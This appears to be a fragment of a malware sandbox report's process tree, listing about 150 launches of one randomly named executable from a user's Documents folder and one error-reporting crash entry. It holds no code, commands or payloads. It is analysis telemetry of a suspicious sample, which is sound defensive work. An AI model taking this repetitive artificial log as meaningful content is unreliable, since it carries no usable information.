- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9520
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:8032
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:5052
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9580
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10668
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:11152
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:7916
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7916 -s 24
      4⤵
      Program crash
      PID:10580
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:1920
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10288
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9732
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:11708
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:12092
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:11888
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:11260
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10832
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:11868
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:1976
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:2292
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:12664
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:13056
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:12100
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:13076
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10804
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:12024
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10356
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:12372
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:13464
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:13900
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:14332
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:13828
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:12784
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:13952
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10608
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:14636
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:15216
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:14928
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:14832
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:15040
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:15464
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:16004
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:16096
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:15300
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:13564
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:16252
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:17064
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:12936
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:15288
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:6192
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:17676
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:17468
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:10444
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:18376
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:18060
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:17952
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:18136
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:7576
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:18708
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19076
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:9004
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:17820
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19220
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:14392
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19212
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:3176
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:11640
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19648
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:20084
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19036
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:18620
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19612
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:20124
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:15504
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:17792
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:20192
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:20300
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:21088
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:22032
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:17444
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:8320
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:22736
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:23504
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:22744
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:23068
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:23028
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19964
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:24680
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:25544
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:24632
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:24876
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:23916
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:15144
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:20244
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:24696
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:26324
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:26140
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:26556
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:25852
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:24604
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:27300
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:26856
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:21984
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:27268
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:26876
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19548
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:25856
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:28232
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:27652
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:28288
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:26812
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:21852
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29156
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29624
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:28420
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:28036
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:27588
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:28788
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29136
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:25920
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:21768
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:27968
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:25300
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29244
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29012
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:26692
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29940
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:30640
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:31012
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:31320
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29652
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:31276
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:4504
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:31000
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:5692
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:30032
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:30208
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29436
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:29168
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:7952
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:26316
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:4144
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:1328
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:32748
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:32624
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:32444
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:32728
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:30228
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:23420
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:19316
- - C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    C:\Users\Admin\Documents\8kpa_geWtSVxKnVMOAjSSqfZ.exe
    3⤵
    PID:22288
